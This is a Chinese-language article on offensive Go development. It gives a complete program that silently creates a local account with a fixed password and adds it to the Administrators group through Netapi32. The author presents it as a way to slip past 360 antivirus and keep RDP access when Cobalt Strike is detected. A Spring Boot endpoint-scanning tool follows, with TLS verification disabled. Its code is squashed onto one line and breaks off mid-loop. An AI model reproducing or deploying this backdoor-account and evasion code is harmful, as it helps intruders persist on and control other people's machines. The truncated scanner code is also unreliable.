
目录:Golang安全开发闲谈 / 简介 / windows api 使用 / Spring渗透线程小工具 / ScareCrow数字签名 / Go版本的地狱门 / argue欺骗 / cobalt strike免杀加载器 / .NET assembly 内存加载 / 浏览器解密 / Go编译技巧 / 总结

Golang安全开发闲谈

简介

主要是给师傅们,介绍一下Golang的一些用法和小技巧.

windows api 使用

首先我们介绍用Go语言去添加用户.这里可以给大家介绍一个小技巧,因为Go和C的语法是比较相似的,所以可以去对比C的写法来写Go的.

要注意的是,这些结构体和常量在C语言(Windows SDK头文件)里都已经定义好了,但Go的标准库并没有提供,所以我们要在Go里按原来的内存布局(字段顺序和宽度)重写一遍。

USER_INFO_1 ui; // already defined in C (Windows SDK); Ctrl+click the type name in the IDE to open the struct definition

为了让Go减少体积,这里便不去调用第三方库了,下面对一些结构体和类型进行相对应的重写

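// Win32 scalar aliases for the Netapi32 structures below.
//
// LPWSTR is declared as a real Go pointer (*uint16) rather than uintptr: a
// uintptr field hides the pointed-to UTF-16 buffer from the garbage collector,
// so the buffer may be reclaimed before NetUserAdd reads it. A *uint16 field
// keeps the buffer reachable and is still converted at the syscall boundary
// with uintptr(unsafe.Pointer(p)); LPWSTR(unsafe.Pointer(p)) keeps compiling.
type (
	DWORD  uint32
	LPWSTR *uint16
)

// USER_INFO_1 mirrors the Win32 USER_INFO_1 structure (NetUserAdd level 1).
// Only field order and widths matter for the C layout; the Go names are local.
type USER_INFO_1 struct {
	usri1_name         LPWSTR
	usri_password      LPWSTR // Win32 name is usri1_password; kept for the snippets that use it
	usri1_password_age DWORD
	usri1_priv         DWORD
	usri1_home_dir     LPWSTR
	usri1_comment      LPWSTR
	usri1_flags        DWORD
	usri1_script_path  LPWSTR
}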

因为Windows API要求字符串以NUL结尾的UTF-16形式传入,这里可以用syscall.UTF16PtrFromString进行转换(它在字符串含有内嵌NUL时返回错误;下面代码里用的syscall.StringToUTF16Ptr是已废弃的老写法,遇到内嵌NUL会直接panic,建议改用前者)。

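// Marshal the account name and password as NUL-terminated UTF-16 for the
// Win32 API. UTF16PtrFromString reports an embedded NUL as an error instead
// of panicking the way the deprecated StringToUTF16Ptr does.
name, err := syscall.UTF16PtrFromString("test57")
if err != nil {
	panic(err) // only reachable with a malformed literal; a real tool returns the error
}
password, err := syscall.UTF16PtrFromString("P@sss!111")
if err != nil {
	panic(err)
}
// NOTE(review): if LPWSTR is declared as uintptr, storing the pointers here
// hides the buffers from the GC; keep name/password referenced until the
// NetUserAdd call has returned (runtime.KeepAlive) or declare LPWSTR as *uint16.
user.usri1_name = LPWSTR(unsafe.Pointer(name))
user.usri_password = LPWSTR(unsafe.Pointer(password))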

当然我们也可以看到C语言版中有USER_PRIV_USER字样,点进去看是被定义为1的然后我们就可以模仿写出

// Win32 constants copied from the Windows SDK headers so that no third-party
// package is needed.

// USER_PRIV_USER is the usri1_priv value for an ordinary (non-admin) account.
const USER_PRIV_USER = 1

// UF_SCRIPT is the usri1_flags bit that NetUserAdd requires to be set.
const UF_SCRIPT = 0x0001

// NERR_Success is the NET_API_STATUS value returned on success.
const NERR_Success = 0

当这些结构体和变量都处理好之后,我们便可以调用DLL里的API进行操作了(注意调用方本身需要管理员权限,否则NetUserAdd会返回拒绝访问)。最终得到的32位Go程序大约600KB,不依赖运行环境;这个功能目前也集成在免杀平台里。

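// author: YanMu
//
// Creates a local Windows account and adds it to the local Administrators
// group by calling NetUserAdd and NetLocalGroupAddMembers in Netapi32.dll
// directly through package syscall, so the binary needs no third-party
// packages and stays small.
//
// Runs on Windows only, and the caller must hold an elevated (administrator)
// token; otherwise the API calls fail with ERROR_ACCESS_DENIED (5).
package main

import (
	"fmt"
	"os"
	"syscall"
	"unsafe"
)

// Win32 scalar types. LPWSTR is a real Go pointer (*uint16) instead of a
// uintptr so the UTF-16 buffers stored in the structs stay visible to the
// garbage collector until the syscall that reads them has returned.
type (
	DWORD  uint32
	LPWSTR *uint16
)

const (
	USER_PRIV_USER = 1      // usri1_priv: ordinary user account
	UF_SCRIPT      = 0x0001 // usri1_flags: must always be set for NetUserAdd
	NERR_Success   = 0      // NET_API_STATUS returned on success
)

// Defaults used when no account name/password is given on the command line.
//
// NOTE(review): the group name "Administrators" is localized on non-English
// Windows; resolving the well-known SID S-1-5-32-544 would be more robust.
const (
	defaultUserName = "test57"
	defaultPassword = "P@sss!111"
	adminGroupName  = "Administrators"
)

// USER_INFO_1 mirrors the Win32 USER_INFO_1 structure (NetUserAdd level 1).
// Field order and widths must match the C layout; the Go names are free.
type USER_INFO_1 struct {
	usri1_name         LPWSTR
	usri_password      LPWSTR // Win32 name: usri1_password
	usri1_password_age DWORD
	usri1_priv         DWORD
	usri1_home_dir     LPWSTR
	usri1_comment      LPWSTR
	usri1_flags        DWORD
	usri1_script_path  LPWSTR
}

// _LOCALGROUP_USERS_INFO_0 is the single-string member record handed to
// NetLocalGroupAddMembers at level 3 (one "domain\name" or plain user name).
type _LOCALGROUP_USERS_INFO_0 struct {
	lgrui0_name LPWSTR
}

// netapi holds the Netapi32.dll handle and the two entry points this
// program needs.
type netapi struct {
	lib                     syscall.Handle
	netUserAdd              uintptr
	netLocalGroupAddMembers uintptr
}

// loadNetapi loads Netapi32.dll and resolves both procedures. Every lookup
// error is reported instead of being discarded, so a failed resolution can
// no longer turn into a Syscall6 through address 0.
func loadNetapi() (*netapi, error) {
	// NOTE(review): a bare module name goes through the loader's search
	// order; if the binary may run from a writable directory, load by an
	// absolute System32 path instead.
	lib, err := syscall.LoadLibrary("Netapi32.dll")
	if err != nil {
		return nil, fmt.Errorf("loading Netapi32.dll: %w", err)
	}
	n := &netapi{lib: lib}
	if n.netUserAdd, err = syscall.GetProcAddress(lib, "NetUserAdd"); err != nil {
		_ = syscall.FreeLibrary(lib)
		return nil, fmt.Errorf("resolving NetUserAdd: %w", err)
	}
	if n.netLocalGroupAddMembers, err = syscall.GetProcAddress(lib, "NetLocalGroupAddMembers"); err != nil {
		_ = syscall.FreeLibrary(lib)
		return nil, fmt.Errorf("resolving NetLocalGroupAddMembers: %w", err)
	}
	return n, nil
}

// close releases the DLL handle; there is nothing useful to do if that fails.
func (n *netapi) close() {
	_ = syscall.FreeLibrary(n.lib)
}

// addUser creates the local account name with the given password
// (NetUserAdd, level 1, on the local machine). It returns an error carrying
// the NET_API_STATUS code on failure.
func (n *netapi) addUser(name, password string) error {
	// UTF16PtrFromString returns an error on an embedded NUL instead of
	// panicking like the deprecated StringToUTF16Ptr.
	namePtr, err := syscall.UTF16PtrFromString(name)
	if err != nil {
		return fmt.Errorf("encoding user name %q: %w", name, err)
	}
	pwdPtr, err := syscall.UTF16PtrFromString(password)
	if err != nil {
		return fmt.Errorf("encoding password: %w", err)
	}
	info := USER_INFO_1{
		usri1_name:    namePtr,
		usri_password: pwdPtr,
		usri1_priv:    USER_PRIV_USER,
		usri1_flags:   UF_SCRIPT,
	}
	// parm_err is an output LPDWORD: on ERROR_INVALID_PARAMETER it receives
	// the index of the offending USER_INFO_1 field. The original passed the
	// value 0 (NULL) here, which worked but threw that diagnostic away.
	var parmErr DWORD
	// NetUserAdd(servername=NULL -> local machine, level=1, buf, parm_err)
	status, _, _ := syscall.Syscall6(n.netUserAdd, 4,
		0, 1, uintptr(unsafe.Pointer(&info)), uintptr(unsafe.Pointer(&parmErr)), 0, 0)
	if status != NERR_Success {
		return fmt.Errorf("NetUserAdd(%q): NET_API_STATUS %d (parm_err %d)", name, status, parmErr)
	}
	return nil
}

// addToLocalGroup adds the account member to the local group
// (NetLocalGroupAddMembers, level 3, one entry).
func (n *netapi) addToLocalGroup(group, member string) error {
	groupPtr, err := syscall.UTF16PtrFromString(group)
	if err != nil {
		return fmt.Errorf("encoding group name %q: %w", group, err)
	}
	memberPtr, err := syscall.UTF16PtrFromString(member)
	if err != nil {
		return fmt.Errorf("encoding member name %q: %w", member, err)
	}
	entry := _LOCALGROUP_USERS_INFO_0{lgrui0_name: memberPtr}
	// NetLocalGroupAddMembers(servername=NULL, groupname, level=3, buf, totalentries=1)
	status, _, _ := syscall.Syscall6(n.netLocalGroupAddMembers, 5,
		0, uintptr(unsafe.Pointer(groupPtr)), 3, uintptr(unsafe.Pointer(&entry)), 1, 0)
	if status != NERR_Success {
		return fmt.Errorf("NetLocalGroupAddMembers(%q, %q): NET_API_STATUS %d", group, member, status)
	}
	return nil
}

// main creates the account and puts it in the Administrators group. The
// account name and password may be given as the first two arguments,
// otherwise the built-in defaults are used (command-line arguments are
// visible to other processes on the host). As in the original, the group
// membership is still attempted when account creation fails, e.g. because
// the account already exists; the exit code is non-zero if either step failed.
func main() {
	name, password := defaultUserName, defaultPassword
	if len(os.Args) >= 3 {
		name, password = os.Args[1], os.Args[2]
	}

	api, err := loadNetapi()
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}

	exitCode := 0
	if err := api.addUser(name, password); err != nil {
		fmt.Fprintln(os.Stderr, "添加用户失败:", err)
		exitCode = 1
	} else {
		fmt.Println("添加用户成功!")
	}

	if err := api.addToLocalGroup(adminGroupName, name); err != nil {
		fmt.Fprintln(os.Stderr, "添加用户到管理员组失败:", err)
		exitCode = 1
	} else {
		fmt.Println("添加用户到管理员组成功!")
	}

	api.close() // explicit: os.Exit does not run deferred calls
	os.Exit(exitCode)
}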

当然这种调用方式可能并没有什么威胁性:我测试Windows Defender和卡巴斯基都可以成功添加用户,360也可以;但看到T00ls上说C版本已经不免杀了:

参考:《最新版360已经拦截netapi加用户了》 - T00ls.Net

所以就写出了Go版本的。毕竟如果杀软拦截了CS的特征,但新建的账户还能登上3389(RDP),还是挺香的。

Spring渗透线程小工具

在实际操作的时候,我们都会根据需求来写一些满足自己的小工具

这里以比较火的Spring Boot为例。需要注意,下面的扫描器在http.Transport里设置了InsecureSkipVerify: true来跳过TLS证书校验——对扫描使用自签名证书的目标这是有意为之,但不要把这个Transport复用到需要校验证书的场景。

//author:YanMupackage main/*LQ*/import ( "bufio" "crypto/tls" "flag" "fmt" "io/ioutil" "net/http" "os" "strconv" "strings" "sync" "time")var ( numberTasks []string the_returned_result_is_200 []string list_of_errors []string t = &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } opt = option())type FLAG_TO_CHOOSE struct { src_file string des_file string routineCountTotal int urls string}func option() *FLAG_TO_CHOOSE { src_file := flag.String("s", "spring.txt", "字典文件") urls := flag.String("u", "", "目标url") des_file := flag.String("d", "result.txt", "结果文件") routineCountTotal := flag.Int("t", 40, "线程数量{默认为40}") flag.Parse() return &FLAG_TO_CHOOSE{src_file: *src_file, urls: *urls, des_file: *des_file, routineCountTotal: *routineCountTotal}}func title() { fmt.Println(` ▄████ ▒█████ ██▒ ▀█▒▒██▒ ██▒▒██░▄▄▄░▒██░ ██▒░▓█ ██▓▒██ ██░░▒▓███▀▒░ ████▓▒░ ░▒ ▒ ░ ▒░▒░▒░ ░ ░ ░ ▒ ▒░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░`)}func main() { title() file, err := os.Open(opt.src_file) if err != nil { fmt.Println("打开文件时候出错") } defer func() { file.Close() }() n := bufio.NewScanner(file) for n.Scan() { data := n.Text() numberTasks = append(numberTasks, data) } client = &http.Client{ Transport: t, Timeout: 20 * time.Second, } beg := time.Now() wg := &sync.WaitGroup{} tasks := make(chan string) results := make(chan string) go func() { for result := range results { if result == "" { close(results) } else if strings.Contains(result, "200") || strings.Contains(result, "端点") { fmt.Println(result) the_returned_result_is_200 = append(the_returned_result_is_200, result) } else if strings.Contains(result, "500") { if strings.Contains(result, "article") { fmt.Println(result) the_returned_result_is_200 = append(the_returned_result_is_200, result) } } else { list_of_errors = append(list_of_errors, result) } } }() for i := 0; i

